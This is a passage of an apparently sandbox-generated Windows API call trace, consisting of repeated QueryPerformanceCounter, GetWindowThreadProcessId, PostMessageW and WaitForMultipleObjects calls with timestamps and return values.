0xb48 [0163.902] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36b6cd5f, lParam=0x3d09) returned 1 [0163.902] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098272121964) returned 1 [0163.918] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098273690075) returned 1 [0163.918] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0163.918] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0164.414] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098323277962) returned 1 [0164.425] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098324383255) returned 1 [0164.425] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.425] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36bec838, lParam=0x3d09) returned 1 [0164.425] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098324427015) returned 1 [0164.441] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098325986551) returned 1 [0164.441] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.441] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36bf06d9, lParam=0x3d09) returned 1 [0164.441] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098326017884) returned 1 [0164.457] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098327590692) returned 1 [0164.457] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.457] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36bf4582, lParam=0x3d09) returned 1 [0164.457] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098327693222) returned 1 [0164.473] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098329184050) returned 1 [0164.473] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.473] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36bf83c0, lParam=0x3d09) returned 1 [0164.473] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098329219178) returned 1 [0164.489] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098330797692) returned 1 [0164.489] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.489] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36bfc2c8, lParam=0x3d09) returned 1 [0164.489] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098330834456) returned 1 [0164.505] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098332389912) returned 1 [0164.505] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.505] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c000fb, lParam=0x3d09) returned 1 [0164.505] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098332453192) returned 1 [0164.521] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098333993172) returned 1 [0164.521] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.521] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c03f9b, lParam=0x3d09) returned 1 [0164.521] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098334037656) returned 1 [0164.537] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098335592100) returned 1 [0164.537] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.537] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c07e11, lParam=0x3d09) returned 1 [0164.537] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098335648753) returned 1 [0164.553] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098337244230) returned 1 [0164.554] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.554] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c0be9a, lParam=0x3d09) returned 1 [0164.554] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098337281808) returned 1 [0164.569] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098338836279) returned 1 [0164.569] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.569] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c0fcca, lParam=0x3d09) returned 1 [0164.570] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098338869868) returned 1 [0164.585] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098340445927) returned 1 [0164.586] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.586] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c13bab, lParam=0x3d09) returned 1 [0164.586] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098340538357) returned 1 [0164.601] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098342043417) returned 1 [0164.602] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.602] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c17a12, lParam=0x3d09) returned 1 [0164.602] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098342085876) returned 1 [0164.617] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098343644999) returned 1 [0164.618] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.618] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c1b8a1, lParam=0x3d09) returned 1 [0164.618] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098343685302) returned 1 [0164.633] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098345241618) returned 1 [0164.633] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.634] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c1f700, lParam=0x3d09) returned 1 [0164.634] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098345284175) returned 1 [0164.649] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098346841965) returned 1 [0164.649] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.650] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c23583, lParam=0x3d09) returned 1 [0164.650] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098346880522) returned 1 [0164.665] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098348437406) returned 1 [0164.665] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0164.666] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36c273d6, lParam=0x3d09) returned 1 [0164.666] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098348477173) returned 1 [0164.681] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098350041479) returned 1 [0164.682] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098350062255) returned 1 [0164.697] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098351638969) returned 1 [0164.698] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098351655870) returned 1 [0164.713] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098353238252) returned 1 [0164.714] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098353255430) returned 1 [0164.729] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098354840429) returned 1 [0164.730] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098354860825) returned 1 [0164.745] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098356440679) returned 1 [0164.746] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0164.746] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0168.036] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098685498799) returned 1 [0168.043] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098686230707) returned 1 [0168.043] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.044] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36f5fee3, lParam=0x3d09) returned 1 [0168.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098686309689) returned 1 [0168.059] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098687832701) returned 1 [0168.059] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.059] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36f63d77, lParam=0x3d09) returned 1 [0168.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098687870530) returned 1 [0168.075] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098689429246) returned 1 [0168.075] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.075] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36f67bd4, lParam=0x3d09) returned 1 [0168.076] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098689463493) returned 1 [0168.091] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098691046383) returned 1 [0168.092] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.092] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36f6baff, lParam=0x3d09) returned 1 [0168.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098691084844) returned 1 [0168.107] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098692633957) returned 1 [0168.107] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.107] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36f6f903, lParam=0x3d09) returned 1 [0168.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098692675610) returned 1 [0168.123] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098694228575) returned 1 [0168.123] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.123] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36f7374d, lParam=0x3d09) returned 1 [0168.124] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098694277024) returned 1 [0168.139] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098695838487) returned 1 [0168.140] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0168.140] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0168.422] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098724056679) returned 1 [0168.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098724758095) returned 1 [0168.429] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.429] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fbdfdc, lParam=0x3d09) returned 1 [0168.429] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098724810460) returned 1 [0168.445] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098726360814) returned 1 [0168.445] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.445] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fc1e78, lParam=0x3d09) returned 1 [0168.445] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098726397723) returned 1 [0168.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098727958748) returned 1 [0168.461] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.461] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fc5ce3, lParam=0x3d09) returned 1 [0168.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098727995854) returned 1 [0168.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098729563536) returned 1 [0168.477] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.477] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fc9b93, lParam=0x3d09) returned 1 [0168.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098729616062) returned 1 [0168.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098731157911) returned 1 [0168.493] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.493] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fcd9db, lParam=0x3d09) returned 1 [0168.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098731196771) returned 1 [0168.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098732758229) returned 1 [0168.509] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.509] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fd185e, lParam=0x3d09) returned 1 [0168.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098732811961) returned 1 [0168.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098734358321) returned 1 [0168.525] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.525] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fd56df, lParam=0x3d09) returned 1 [0168.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098734396982) returned 1 [0168.541] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098735961169) returned 1 [0168.541] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.541] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fd957b, lParam=0x3d09) returned 1 [0168.541] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098736002872) returned 1 [0168.557] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098737563966) returned 1 [0168.557] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.557] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fdd417, lParam=0x3d09) returned 1 [0168.557] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098737621782) returned 1 [0168.573] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098739161916) returned 1 [0168.573] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.573] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fe1283, lParam=0x3d09) returned 1 [0168.573] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098739203416) returned 1 [0168.589] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098740760689) returned 1 [0168.589] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.589] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fe50f6, lParam=0x3d09) returned 1 [0168.589] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098740799951) returned 1 [0168.605] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098742363812) returned 1 [0168.605] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.605] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fe8f96, lParam=0x3d09) returned 1 [0168.605] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098742401930) returned 1 [0168.621] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098743956647) returned 1 [0168.621] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.621] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x36fecdce, lParam=0x3d09) returned 1 [0168.621] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098743998360) returned 1 [0168.636] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098745506824) returned 1 [0168.636] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098745520726) returned 1 [0168.652] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098747110764) returned 1 [0168.652] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098747123966) returned 1 [0168.668] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098748707319) returned 1 [0168.668] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098748721334) returned 1 [0168.684] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098750314586) returned 1 [0168.684] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098750329109) returned 1 [0168.700] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098751908370) returned 1 [0168.700] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098751923629) returned 1 [0168.716] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098753505328) returned 1 [0168.716] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098753519627) returned 1 [0168.732] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098755107741) returned 1 [0168.732] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098755127138) returned 1 [0168.748] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098756716736) returned 1 [0168.748] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0168.748] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3700c03f, lParam=0x3d09) returned 1 [0168.748] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098756752290) returned 1 [0168.764] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3098758313841) returned 1 [0168.764] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0168.765] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0172.003] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099082204533) returned 1 [0172.006] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099082513437) returned 1 [0172.006] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.006] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373276ae, lParam=0x3d09) returned 1 [0172.007] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099082559821) returned 1 [0172.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099087474777) returned 1 [0172.056] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.056] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3733387b, lParam=0x3d09) returned 1 [0172.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099087506057) returned 1 [0172.056] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099087545895) returned 1 [0172.056] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.057] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37333b42, lParam=0x3d09) returned 1 [0172.057] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099087569394) returned 1 [0172.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099088912785) returned 1 [0172.070] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.070] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x373370a7, lParam=0x3d09) returned 1 [0172.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099088945476) returned 1 [0172.086] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099090508520) returned 1 [0172.086] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.086] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3733aefd, lParam=0x3d09) returned 1 [0172.086] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099090540788) returned 1 [0172.102] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099092108349) returned 1 [0172.102] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0172.103] WaitForMultipleObjects (nCount=0x3, lpHandles=0x6adfe6c*=0x310, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0172.459] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099127767620) returned 1 [0172.470] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099128858162) returned 1 [0172.470] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.470] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x37398905, lParam=0x3d09) returned 1 [0172.470] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099128893145) returned 1 [0172.486] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099130457937) returned 1 [0172.486] GetWindowThreadProcessId (in: hWnd=0x103e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0172.486] PostMessageW (hWnd=0x103e4, Msg=0x401, wParam=0x3739c783, lParam=0x3d09) returned 1 [0172.486] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099130492139) returned 1 [0172.502] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3099132066069) returned 